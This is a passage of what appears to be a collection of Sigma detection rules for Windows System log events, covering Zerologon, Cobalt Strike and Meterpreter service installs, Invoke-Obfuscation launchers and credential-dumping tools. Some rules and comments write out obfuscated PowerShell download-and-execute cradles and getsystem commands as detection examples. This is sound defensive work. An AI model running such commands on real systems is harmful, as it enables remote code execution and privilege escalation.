    "content": "title: Windows Update Error\nid: 13cfeb75-9e33-4d04-b0f7-ab8faaa95a59\nstatus: stable\ndescription: |\n    Detects Windows update errors including installation failures and connection issues. Defenders should observe this in case critical update KBs aren't installed.\nreferences:\n    - https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/1903/W10_1903_Pro_20200714_18362.959/WEPExplorer/Microsoft-Windows-WindowsUpdateClient.xml\nauthor: frack113\ndate: 2021-12-04\nmodified: 2023-09-07\ntags:\n    - attack.impact\n    - attack.resource-development\n    - attack.t1584\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: Microsoft-Windows-WindowsUpdateClient\n        EventID:\n            - 16 # Unable to Connect: Windows is unable to connect to the automatic updates service and therefore cannot download and install updates according to the set schedule\n            - 20 # Installation Failure: Windows failed to install the following update with error\n            - 24 # Uninstallation Failure: Windows failed to uninstall the following update with error\n            - 213 # Revert Failure: Windows failed to revert the following update with error\n            - 217 # Commit Failure: Windows failed to commit the following update with error\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: informational\n"
  },
  {
    "path": "rules/windows/builtin/system/netlogon/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml",
    "content": "title: Zerologon Exploitation Using Well-known Tools\nid: 18f37338-b9bd-4117-a039-280c81f7a596\nstatus: stable\ndescription: This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.\nreferences:\n    - https://www.secura.com/blog/zero-logon\n    - https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382\nauthor: 'Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community'\ndate: 2020-10-13\nmodified: 2021-05-30\ntags:\n    - attack.t1210\n    - attack.lateral-movement\nlogsource:\n    service: system\n    product: windows\ndetection:\n    selection:\n        EventID:\n            - 5805\n            - 5723\n    keywords:\n        - kali\n        - mimikatz\n    condition: selection and keywords\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/system/netlogon/win_system_vul_cve_2020_1472.yml",
    "content": "title: Vulnerable Netlogon Secure Channel Connection Allowed\nid: a0cb7110-edf0-47a4-9177-541a4083128a\nstatus: test\ndescription: Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.\nreferences:\n    - https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc\nauthor: NVISO\ndate: 2020-09-15\nmodified: 2022-12-25\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: NetLogon  # Active Directory: NetLogon ETW GUID {F33959B4-DBEC-11D2-895B-00C04F79AB69}\n        EventID: 5829\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/ntfs/win_system_ntfs_vuln_exploit.yml",
    "content": "title: NTFS Vulnerability Exploitation\nid: f14719ce-d3ab-4e25-9ce6-2899092260b0\nstatus: test\ndescription: This the exploitation of a NTFS vulnerability as reported without many details via Twitter\nreferences:\n    - https://twitter.com/jonasLyk/status/1347900440000811010\n    - https://twitter.com/wdormann/status/1347958161609809921\n    - https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-01-11\nmodified: 2022-12-25\ntags:\n    - attack.impact\n    - attack.t1499.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: Ntfs\n        EventID: 55\n        Origin: 'File System Driver'\n        Description|contains|all:\n            - 'contains a corrupted file record'\n            - 'The name of the file is \"\\\"'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_cobaltstrike_service_installs.yml",
    "content": "title: CobaltStrike Service Installations - System\nid: 5a105d34-05fc-401e-8553-272b45c1522d\nstatus: test\ndescription: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement\nreferences:\n    - https://www.sans.org/webcasts/119395\n    - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/\n    - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/\nauthor: Florian Roth (Nextron Systems), Wojciech Lesicki\ndate: 2021-05-26\nmodified: 2022-11-27\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.t1543.003\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_id:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection1:\n        ImagePath|contains|all:\n            - 'ADMIN$'\n            - '.exe'\n    selection2:\n        ImagePath|contains|all:\n            - '%COMSPEC%'\n            - 'start'\n            - 'powershell'\n    selection3:\n        ImagePath|contains: 'powershell -nop -w hidden -encodedcommand'\n    selection4:\n        ImagePath|base64offset|contains: \"IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:\"\n    condition: selection_id and (selection1 or selection2 or selection3 or selection4)\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_defender_disabled.yml",
    "content": "title: Windows Defender Threat Detection Service Disabled\nid: 6c0a7755-6d31-44fa-80e1-133e57752680\nrelated:\n    - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62\n      type: derived\nstatus: stable\ndescription: Detects when the \"Windows Defender Threat Protection\" service is disabled.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\nauthor: Ján Trenčanský, frack113\ndate: 2020-07-28\nmodified: 2024-07-02\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        EventID: 7036\n        Provider_Name: 'Service Control Manager'\n        # Note: The service name and messages are localized\n        param1:\n            - 'Windows Defender Antivirus Service'\n            - 'Service antivirus Microsoft Defender' # French OS\n        param2:\n            - 'stopped'\n            - 'arrêté' # French OS\n    condition: selection\nfalsepositives:\n    - Administrator actions\n    - Auto updates of Windows Defender causes restarts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_hack_smbexec.yml",
    "content": "title: smbexec.py Service Installation\nid: 52a85084-6989-40c3-8f32-091e12e13f09\nstatus: test\ndescription: Detects the use of smbexec.py tool by detecting a specific service installation\nreferences:\n    - https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/\n    - https://github.com/fortra/impacket/blob/33058eb2fde6976ea62e04bc7d6b629d64d44712/examples/smbexec.py#L286-L296\n    - https://github.com/fortra/impacket/blob/edef71f17bc1240f9f8c957bbda98662951ac3ec/examples/smbexec.py#L60 # Old service name\nauthor: Omer Faruk Celik\ndate: 2018-03-20\nmodified: 2023-11-09\ntags:\n    - attack.lateral-movement\n    - attack.execution\n    - attack.t1021.002\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_eid:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_service_name:\n        ServiceName: 'BTOBTO'\n    selection_service_image:\n        ImagePath|contains:\n            - '.bat & del '\n            - '__output 2^>^&1 >'\n    condition: selection_eid and 1 of selection_service_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_clip_services.yml",
    "content": "title: Invoke-Obfuscation CLIP+ Launcher - System\nid: f7385ee2-0e0c-11eb-adc1-0242ac120002\nstatus: test\ndescription: Detects Obfuscated use of Clip.exe to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 26)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-13\nmodified: 2023-02-20\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ImagePath|contains|all:\n            - 'cmd'\n            - '&&'\n            - 'clipboard]::'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_obfuscated_iex_services.yml",
    "content": "title: Invoke-Obfuscation Obfuscated IEX Invocation - System\nid: 51aa9387-1c53-4153-91cc-d73c59ae1ca9\nstatus: test\ndescription: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references\nreferences:\n    - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888\nauthor: Daniel Bohannon (@Mandiant/@FireEye), oscd.community\ndate: 2019-11-08\nmodified: 2022-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_eid:\n        EventID: 7045\n    selection_imagepath:\n        - ImagePath|re: '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\['\n        - ImagePath|re: '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\['\n        - ImagePath|re: '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\['\n        - ImagePath|re: '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}'\n        - ImagePath|re: '\\\\*mdr\\*\\W\\s*\\)\\.Name'\n        - ImagePath|re: '\\$VerbosePreference\\.ToString\\('\n        - ImagePath|re: '\\String\\]\\s*\\$VerbosePreference'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_stdin_services.yml",
    "content": "title: Invoke-Obfuscation STDIN+ Launcher - System\nid: 72862bf2-0eb1-11eb-adc1-0242ac120002\nstatus: test\ndescription: Detects Obfuscated use of stdin to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 25)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-15\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_main:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        # ImagePath|re: 'cmd.{0,5}(?:\\/c|\\/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\\\"'\n        # Example 1: c:\\windows\\sYstEm32\\CmD.eXE /C\"echO\\Invoke-Expression (New-Object Net.WebClient).DownloadString | POwersHELl -NoEXiT -\"\n        # Example 2: c:\\WiNDOws\\sysTEm32\\cmd.EXe /C \" ECHo Invoke-Expression (New-Object Net.WebClient).DownloadString | POwersHELl -nol ${EXEcUtIONCONTeXT}.INvOkEComMANd.InvOKEScRIPt( $InpUt )\"\n        ImagePath|contains|all:\n            - 'cmd'\n            - 'powershell'\n        ImagePath|contains:\n            - '/c'\n            - '/r'\n    selection_other:\n        - ImagePath|contains: 'noexit'\n        - ImagePath|contains|all:\n              - 'input'\n              - '$'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_var_services.yml",
    "content": "title: Invoke-Obfuscation VAR+ Launcher - System\nid: 8ca7004b-e620-4ecb-870e-86129b5b8e75\nstatus: test\ndescription: Detects Obfuscated use of Environment Variables to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 24)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-15\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        # ImagePath|re: 'cmd.{0,5}(?:\\/c|\\/r)(?:\\s|)\\\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\\\"\\s+?\\-f(?:.*\\)){1,}.*\\\"'\n        # Example 1: C:\\winDoWs\\SySTeM32\\cmd.Exe /C\"SET NOtI=Invoke-Expression (New-Object Net.WebClient).DownloadString&& PowERshElL -NOl SET-iteM ( 'VAR' + 'i'+ 'A' + 'blE:Ao6' + 'I0') ( [TYpe](\\\"{2}{3}{0}{1}\\\"-F 'iRoN','mENT','e','nv') ) ; ${exECUtIONCOnTEXT}.\\\"IN`VO`KecOmMaND\\\".\\\"inVo`KES`crIPt\\\"( ( ( GEt-VAriAble ( 'a' + 'o6I0') -vaLU )::(\\\"{1}{4}{2}{3}{0}\\\" -f'e','gETenvIR','NtvaRIa','BL','ONme' ).Invoke(( \\\"{0}{1}\\\"-f'n','oti' ),( \\\"{0}{1}\\\" -f'pRoC','esS') )) )\"\n        # Example 2: cMD.exe /C \"seT SlDb=Invoke-Expression (New-Object Net.WebClient).DownloadString&& pOWErShell .(( ^&(\\\"{1}{0}{2}{3}\\\" -f 'eT-vaR','G','iab','lE' ) (\\\"{0}{1}\\\" -f '*m','DR*' ) ).\\\"na`ME\\\"[3,11,2]-JOIN'' ) ( ( ^&(\\\"{0}{1}\\\" -f'g','CI' ) (\\\"{0}{1}\\\" -f 'ENV',':SlDb' ) ).\\\"VA`luE\\\" ) \"\n        ImagePath|contains|all:\n            - 'cmd'\n            - '\"set'\n            - '-f'\n        ImagePath|contains:\n            - '/c'\n            - '/r'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_compress_services.yml",
    "content": "title: Invoke-Obfuscation COMPRESS OBFUSCATION - System\nid: 175997c5-803c-4b08-8bb0-70b099f47595\nstatus: test\ndescription: Detects Obfuscated Powershell via COMPRESS OBFUSCATION\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 19)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-18\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ImagePath|contains|all:\n            - 'new-object'\n            - 'text.encoding]::ascii'\n            - 'readtoend'\n        ImagePath|contains:\n            - ':system.io.compression.deflatestream'\n            - 'system.io.streamreader'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_rundll_services.yml",
    "content": "title: Invoke-Obfuscation RUNDLL LAUNCHER - System\nid: 11b52f18-aaec-4d60-9143-5dd8cc4706b9\nstatus: test\ndescription: Detects Obfuscated Powershell via RUNDLL LAUNCHER\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 23)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-18\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ImagePath|contains|all:\n            - 'rundll32.exe'\n            - 'shell32.dll'\n            - 'shellexec_rundll'\n            - 'powershell'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_stdin_services.yml",
    "content": "title: Invoke-Obfuscation Via Stdin - System\nid: 487c7524-f892-4054-b263-8a0ace63fc25\nstatus: test\ndescription: Detects Obfuscated Powershell via Stdin in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task28)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-12\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        # ImagePath|re: '(?i)(set).*&&\\s?set.*(environment|invoke|\\${?input).*&&.*\"'\n        ImagePath|contains|all:\n            - 'set'\n            - '&&'\n        ImagePath|contains:\n            - 'environment'\n            - 'invoke'\n            - 'input'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_clip_services.yml",
    "content": "title: Invoke-Obfuscation Via Use Clip - System\nid: 63e3365d-4824-42d8-8b82-e56810fefa0c\nstatus: test\ndescription: Detects Obfuscated Powershell via use Clip.exe in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task29)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-09\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ImagePath|contains: '(Clipboard|i'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_mshta_services.yml",
    "content": "title: Invoke-Obfuscation Via Use MSHTA - System\nid: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4\nstatus: test\ndescription: Detects Obfuscated Powershell via use MSHTA in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task31)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-09\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ImagePath|contains|all:\n            - 'mshta'\n            - 'vbscript:createobject'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_rundll32_services.yml",
    "content": "title: Invoke-Obfuscation Via Use Rundll32 - System\nid: 641a4bfb-c017-44f7-800c-2aee0184ce9b\nstatus: test\ndescription: Detects Obfuscated Powershell via use Rundll32 in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task30)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-09\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ImagePath|contains|all:\n            - '&&'\n            - 'rundll32'\n            - 'shell32.dll'\n            - 'shellexec_rundll'\n        ImagePath|contains:\n            - 'value'\n            - 'invoke'\n            - 'comspec'\n            - 'iex'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_var_services.yml",
    "content": "title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System\nid: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6\nstatus: test\ndescription: Detects Obfuscated Powershell via VAR++ LAUNCHER\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task27)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-13\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        # ImagePath|re: '(?i)&&set.*(\\{\\d\\}){2,}\\\\\\\"\\s+?\\-f.*&&.*cmd.*\\/c' # FPs with |\\/r\n        # Example 1: CMD /C\"sET KUR=Invoke-Expression (New-Object Net.WebClient).DownloadString&&Set MxI=C:\\wINDowS\\sYsWow64\\winDOWspoWERSheLl\\V1.0\\PowerShelL.EXe ${ExEcut`IoN`cON`TExT}.\\\"invo`kEcoMm`A`ND\\\".( \\\"{2}{1}{0}\\\" -f 'pt','EscRi','INvOk' ).Invoke( ( .( \\\"{0}{1}\\\" -f'D','IR' ) ( \\\"{0}{1}\\\"-f'ENV:kU','R')).\\\"vAl`Ue\\\" )&& CMD /C%mXI%\"\n        # Example 2: c:\\WiNDOWS\\sYSTEm32\\CmD.exE /C \"sEt DeJLz=Invoke-Expression (New-Object Net.WebClient).DownloadString&&set yBKM=PoWERShelL -noeX ^^^&(\\\"{2}{0}{1}\\\"-f '-ItE','m','seT') ( 'V' + 'a'+ 'RiAblE:z8J' +'U2' + 'l' ) ([TYpE]( \\\"{2}{3}{0}{1}\\\"-f 'e','NT','e','NViRONM' ) ) ; ^^^& ( ( [sTrIng]${VE`Rbo`SepReFER`Ence})[1,3] + 'X'-joIN'')( ( (.('gI') ('V' + 'a' + 'RIAbLe:z8j' + 'u2' +'l' ) ).vALUe::( \\\"{2}{5}{0}{1}{6}{4}{3}\\\" -f 'IRo','Nm','GETE','ABlE','I','nv','enTVAr').Invoke(( \\\"{0}{1}\\\"-f'd','ejLz' ),( \\\"{1}{2}{0}\\\"-f'cEss','P','RO') )) )&& c:\\WiNDOWS\\sYSTEm32\\CmD.exE /C %ybkm%\"\n        ImagePath|contains|all:\n            - '&&set'\n            - 'cmd'\n            - '/c'\n            - '-f'\n        ImagePath|contains:\n            - '{0}'\n            - '{1}'\n            - '{2}'\n            - '{3}'\n            - '{4}'\n            - '{5}'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_krbrelayup_service_installation.yml",
    "content": "title: KrbRelayUp Service Installation\nid: e97d9903-53b2-41fc-8cb9-889ed4093e80\nstatus: test\ndescription: Detects service creation from KrbRelayUp tool used for privilege escalation in Windows domain environments where LDAP signing is not enforced (the default settings)\nreferences:\n    - https://github.com/Dec0ne/KrbRelayUp\nauthor: Sittikorn S, Tim Shelton\ndate: 2022-05-11\nmodified: 2022-10-05\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        EventID: 7045\n        ServiceName: 'KrbSCM'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_mal_creddumper.yml",
    "content": "title: Credential Dumping Tools Service Execution - System\nid: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed\nstatus: test\ndescription: Detects well-known credential dumping tools execution via service execution events\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nauthor: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community\ndate: 2017-03-05\nmodified: 2022-11-29\ntags:\n    - attack.credential-access\n    - attack.execution\n    - attack.t1003.001\n    - attack.t1003.002\n    - attack.t1003.004\n    - attack.t1003.005\n    - attack.t1003.006\n    - attack.t1569.002\n    - attack.s0005\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ImagePath|contains:\n            - 'cachedump'\n            - 'dumpsvc'\n            - 'fgexec'\n            - 'gsecdump'\n            - 'mimidrv'\n            - 'pwdump'\n            - 'servpw'\n    condition: selection\nfalsepositives:\n    - Legitimate Administrator using credential dumping tool for password recovery\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml",
    "content": "title: Meterpreter or Cobalt Strike Getsystem Service Installation - System\nid: 843544a7-56e0-4dcc-a44f-5cc266dd97d6\nstatus: test\ndescription: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n    - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/\nauthor: Teymur Kheirkhabarov, Ecco, Florian Roth (Nextron Systems)\ndate: 2019-10-26\nmodified: 2023-11-15\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1134.001\n    - attack.t1134.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_id:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_cli_cmd:\n        # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\\\.\\pipe\\5e120a\n        # cobaltstrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\\\.\\pipe\\5e120a\n        # cobaltstrike getsystem technique 1b (expanded %COMSPEC%): %COMSPEC% /c echo 559891bb017 > \\\\.\\pipe\\5e120a\n        ImagePath|contains|all:\n            - '/c'\n            - 'echo'\n            - '\\pipe\\'\n        ImagePath|contains:\n        - 'cmd'\n        - '%COMSPEC%'\n    selection_cli_rundll:\n        # meterpreter getsystem technique 2: rundll32.exe C:\\Users\\test\\AppData\\Local\\Temp\\tmexsn.dll,a /p:tmexsn\n        ImagePath|contains|all:\n            - 'rundll32'\n            - '.dll,a'\n            - '/p:'\n    selection_cli_share:\n        ImagePath|startswith: '\\\\\\\\127.0.0.1\\\\ADMIN$\\'  # https://twitter.com/svch0st/status/1413688851877416960?lang=en\n    condition: selection_id and 1 of selection_cli_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_moriya_rootkit.yml",
    "content": "title: Moriya Rootkit - System\nid: 25b9c01c-350d-4b95-bed1-836d04a4f324\nstatus: test\ndescription: Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report\nreferences:\n    - https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831\nauthor: Bhabesh Raj\ndate: 2021-05-06\nmodified: 2022-11-29\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ServiceName: ZzNetSvc\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_powershell_script_installed_as_service.yml",
    "content": "title: PowerShell Scripts Installed as Services\nid: a2e5019d-a658-4c6a-92bf-7197b54e2cae\nstatus: test\ndescription: Detects powershell script installed as a Service\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: oscd.community, Natalia Shornikova\ndate: 2020-10-06\nmodified: 2022-12-25\ntags:\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ImagePath|contains:\n            - 'powershell'\n            - 'pwsh'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_anydesk.yml",
    "content": "title: Anydesk Remote Access Software Service Installation\nid: 530a6faa-ff3d-4022-b315-50828e77eef5\nstatus: test\ndescription: Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.\nreferences:\n    - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\n    - https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/\nauthor: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2022-08-11\nmodified: 2025-02-24\ntags:\n    - attack.persistence\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_provider:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_service:\n        - ServiceName|contains|all:\n              - 'AnyDesk' # Covers both AnyDesk Service and AnyDesk MSI Service\n              - 'Service'\n        - ImagePath|contains: 'AnyDesk'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage of the anydesk tool\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_csexecsvc.yml",
    "content": "title: CSExec Service Installation\nid: a27e5fa9-c35e-4e3d-b7e0-1ce2af66ad12\nstatus: test\ndescription: Detects CSExec service installation and execution events\nreferences:\n    - https://github.com/malcomvetter/CSExec\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-07\ntags:\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_eid:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_service:\n        - ServiceName: 'csexecsvc'\n        - ImagePath|endswith: '\\csexecsvc.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_hacktools.yml",
